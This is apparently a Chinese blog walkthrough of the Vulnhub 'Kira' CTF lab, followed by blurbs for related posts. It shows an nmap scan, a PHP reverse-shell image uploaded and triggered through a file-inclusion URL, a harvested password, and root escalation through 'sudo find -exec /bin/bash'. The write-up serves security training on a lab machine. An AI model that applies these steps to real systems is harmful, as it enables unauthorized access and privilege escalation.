Vulnhub:Kira: CTF靶机

最新推荐文章于 2025-06-02 23:49:55 发布
最新推荐文章于 2025-06-02 23:49:55 发布
阅读量322 收藏
点赞数 1
文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/132781380
版权
文章描述了使用KaliLinux进行网络渗透测试的过程,包括通过nmap进行端口扫描,发现80端口上传点和利用文件包含上传恶意PHP脚本获取反弹shell。后续通过找到bassam用户的密码并利用find命令提权,最终实现root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

kali:192.168.111.111

靶机:192.168.111.238

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.238

在这里插入图片描述

访问80端口

在这里插入图片描述

点击upload发现是个上传点

在这里插入图片描述

点击language发现存在文件包含

在这里插入图片描述

在这里插入图片描述

上传php图片马再利用文件包含反弹shell

在这里插入图片描述

http://192.168.111.238/language.php?lang=/uploads/php-reverse-shell.jpg

在这里插入图片描述

在这里插入图片描述

提权

/var/www/html/supersecret-for-aziz/bassam-pass.txt文件中发现bassam用户的密码:Password123!@#

在这里插入图片描述

在这里插入图片描述

bassam用户sudo权限

在这里插入图片描述

提权方法:https://gtfobins.github.io/gtfobins/find/#sudo

在这里插入图片描述

提升为root

sudo -u root find . -exec /bin/bash \;

在这里插入图片描述

ctostm
关注
《Vulhub-KiraCTF靶场实战》
weixin_47118413的博客
03-01 468
靶机难度低级,漏洞也明细,通过上传漏洞结合文件包含漏洞获取shell,在后提权,在通过sudo -l发现find提权,最后用find命令成功提权。
Vulnhub靶机KiraCTF实战
SoporAeternus12的博客
11-26 977
Vulnhub靶机KiraCTF实战 介绍 vulnhub是一个靶机下载网站,大家可以在该网站下载靶机练练手 靶场下载地址:http://www.vulnhub.com/entry/kira-ctf,594/ 信息收集 由于本机的网段是192.168.157.0网段,所以nmap扫描 nmap -sP 192.168.157.144/24 .2是我真实机的ip地址,144是kali地址,156就是目标服务器地址了。 扫描该主机的所有端口和详细信息 nmap -A 192.168.157.156 -p-
关于我渗透KiraCTF靶机这回事
wulanlin的博客
12-30 504
前言 一天不打靶机,难受一整天 靶机地址:https://download.vulnhub.com/kira/KiraCTF.ova 前期信息收集 因为得知靶机的MAC地址,所以直接用arp-scan的命令进行扫描 发现道172.16.10.147为靶机的IP地址,然后对其进行端口扫描->nmap -sS -p- 172.16.10.147 发现只开了一个80端口,其余都没有打开,直接浏览器访问80端口 攻击过程 访问172.16.10.147,发现只有两个按钮 点击
Vulnhub靶机——BASSAMCTF:1
qq_51295120的博客
02-19 4275
Vulnhub靶机——bassamctf 靶机下载链接在这 1. 主机发现: 攻击机和服务器网络适配器都设置为net模式: 识别存活的主机,发现攻击的目标: netdiscover -r 192.168.226.0/24 -i eth0 目标服务器ip为192.168.226.128 2. 信息收集 使用nmap进行全端口服务版本扫描: 操作系统识别: 3. 渗透测试: ssh弱口令并没有跑出来: hydra -l root -P /usr/share/wordlists/rockyou.txt -
Vulnhub: bassamCTF: 1靶机
qq_43884092的博客
08-23 295
靶机:192.168.111.210。
Vulnhub:bassamCTF
Aukum的博客
09-12 709
Vulnhub——bassamCTF: 1靶机,渗透过程涉及wfuzz子域名爆破,sudo提权。补充知识:history命令和~/.bash_history的区别是,只有当前shell关闭时才会将内容写入到~/.bash_history中,而history是随时记录的。
Vulnhub靶机】Deathnote: 1死亡笔记
过期的秋刀鱼
09-16 1359
so Easy
vulnhub中deathnote1靶机
m0_59768231的博客
01-08 1066
靶机开机后,按e键进入安全模式修改下图两个位置为ens33注意x是删除i是输入然后退出打开kali识别存活主机(也就是识别攻击目标):端口扫描:发现22端口和80端口,分别对应ssh协议和http协议ps:常见端口号21 tcp FTP 文件传输协议22 tcp SSH 安全登录、文件传送(SCP)和端口重定向 (xshell)23 tcp Telnet 不安全的文本传送80 tcp HTTP 超文本传送协议(www)
vulnhub靶机bassam-CTF详细渗透过程
2401_82463993的博客
03-21 1055
再到kali中搭建一个http服务器,并创建同名的script.sh,在其中写入我们要执行的命令。访问index.php的时候看到了文件下载,把扫到的文件下载下来看看。页面什么也没有,但在他的源代码里发现了一个域名bassam.ctf。这里可以通过将kali的ip添加到靶机的/etc/hosts中。确实没有其他信息了,一般网站都会有子域名,域名不同访问。PassProgram进行编码加密的,试着用里面的。另外的网页,有独立不同的内容,但不是一个新的域名。切换到/var/www/ctf/看一下这个文件。
安全VulnHub靶场 - W1R3S
最新发布
风舞雪凌月的博客
06-02 252
本文记录了对W1R3S.inc服务器的渗透测试过程。通过扫描发现靶机开放21(FTP)、22(SSH)、80(HTTP)、3306(MySQL)端口,其中FTP存在匿名登录漏洞,获取到包含潜在密码线索的文档。Web服务发现Apache默认页面及Cuppa CMS安装界面,同时存在WordPress目录但访问受限。测试人员尝试了SSH和MySQL的弱口令爆破未果,后续将重点利用FTP获取的信息和Web应用漏洞进行深入渗透,最终目标是获取root权限并找到/root目录下的flag。测试过程展示了从信息收集到漏
Spring Security安全实践指南
静水深流
06-01 811
本文探讨了应用程序安全性的核心价值和Spring Security的架构基础。安全性需要根据数据敏感度分级实施,漏洞会导致多维损失(经济、信誉、法律)。通过典型案例分析,论证了防御投入远低于漏洞修复成本。Spring Security采用过滤器链和认证管理器架构,支持密码编码器演进和最小权限原则,提供表单登录与HTTP Basic等认证方式。系统设计应遵循"默认拒绝"原则,通过分层防护保障关键系统安全
变焦位移计:机器视觉如何克服人工疲劳与主观影响?精准对结构安全实时监测
weixin_43963569的博客
05-30 1158
摘要: 变焦视觉位移监测相比传统人工监测具有显著优势。在精度上,自动化监测可达0.01mm,而人工监测受主观影响,精度仅几毫米。自动化可实现24小时高频监测,人工则耗时且滞后。自动化数据实时上传,真实可靠;人工数据易受人为干预。虽然自动化前期投入高,但长期成本效益更优。自动化监测在连续性、数据呈现等方面也优于人工监测。尽管人工监测在特定场景仍有价值,但自动化监测已成为行业发展趋势。
DeepSeek模型安全部署与对抗防御全攻略
Programming Talk
06-02 192
DeepSeek模型的安全防护需要构建从输入到输出的全链路防御体系。本文介绍的方案已在金融、政务等领域验证,可有效拦截99%以上的常见攻击。建议企业建立持续的安全演练机制,定期更新防护规则库,特别要关注新兴的对抗攻击技术。随着DeepSeek模型能力的演进,安全防护策略也需要同步升级,建议关注OWASP AI Security等权威指南获取最新防护方案。
Google car key:安全、便捷的汽车解锁新选择
2401_86745636的博客
05-30 531
对于支持NFC的Android手机,您需要将手机贴近车门把手才能完成解锁/上锁操作,启动车辆时也需将手机放置在指定感应区。而采用UWB技术的体验则更为智能:只需随身携带支持UWB的手机即可实现"无感操作"——靠近车辆时自动解锁,离开时自动上锁,进入车内后无需任何操作就能直接启动引擎,整个过程完全无需掏出手机。此时只需将设备贴近车门的NFC读取器,即可完成车辆解锁与启动操作。Google car key作为一项创新的汽车解锁技术,通过兼容的Android手机与特定车型的集成,实现了手机作为车钥匙的便捷功能。
NodeJS全栈开发面试题讲解——P6安全与鉴权
kennyharris
06-01 546
编号问题要点简述6.1SQL/XSS/CSRF 防护ORM 防注入、DOM转义防 XSS、CSRF Token + SameSite6.2JWT 签发与校验签名加密、有效期、对称/非对称加密、避免暴露密钥6.3登录暴破防护bcrypt 加密、IP 限制、验证码、行为识别6.4文件上传安全检查 MIME 类型、文件大小、存储路径唯一、过滤木马6.5密码加密算法选择推荐 bcrypt / argon2,使用盐值,严禁存储明文密码。
解决访问网站提示“405 很抱歉,由于您访问的URL有可能对网站造成安全威胁,您的访问被阻断”问题
CoffeMilk的博客
05-30 480
我们访问网站的时候会显示“405 很抱歉,由于您访问的URL有可能对网站造成安全威胁,您的访问被阻断。您的请求ID是:XXXX”,而不能正常的访问网站
从法律层面剖析危化品证书:两证一证背后的安全逻辑
renrenti的博客
05-29 400
证书分类中暗藏法律玄机,负责人证对应《生产经营单位安全培训规定》第 7 条,要求掌握 “本单位安全生产责任制建立及落实”;两者构成了完整的安全管理法律链条,让决策层具备战略思维,执行层具备实操能力。在某危化品仓库爆炸事故中,由于负责人未持证,导致事故责任升级,企业法人被追究刑事责任。特别提醒,经营许可证与安全员证是 “双生证件”,根据《危险化学品经营许可证管理办法》,缺少任一证书都将面临 5-10 万元的罚款。去年,某涂料公司因证书不全,不仅被吊销了执照,法人还被列入了安全生产失信名单。
如何给老旧 iOS App 添加安全保护?用 Ipa Guard 对 IPA 文件混淆加固实录
2501_91510632的博客
05-29 1184
摘要:本文分享了在没有源码的情况下,如何为老旧iOS应用添加安全防护的经验。作者面对一个仅有IPA文件的五年老项目,使用Ipa Guard工具实现了类名、方法名和资源的自动混淆,在10分钟内完成处理并保持功能完整。通过对比分析,混淆后的应用在类名识别度、资源命名、安全加固等方面效果显著提升。文章指出,对无法修改源码的老项目,采用专业混淆工具是快速提升安全性的有效方案,为类似场景提供了实用解决方案。(149字)
Spring Security入门:创建第一个安全REST端点项目
静水深流
06-02 790
本文介绍了Spring Boot项目初始化与基础配置过程,重点解析了Spring Security的HTTP Basic认证机制。通过创建示例项目,展示了如何配置默认安全设置、创建测试端点并验证授权访问。文章详细剖析了HTTP Basic认证原理,包括cURL工具的使用、Base64凭证生成以及401/403状态码的区别。同时深入讲解了Spring Security核心架构,包括认证过滤器的工作流程和UserDetailsService的默认实现特性。最后强调生产环境中必须配合HTTPS使用HTTP Bas
Kira:kira安装操作流程详解
资源摘要信息: "kira:kira安装步骤" 在讨论 "kira:kira安装步骤" 这一主题之前,首先需要明确 "kira:kira" 是指什么。不幸的是,根据目前提供的信息,"kira:kira" 并不是一个广为人知的标准软件或工具。因此,可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值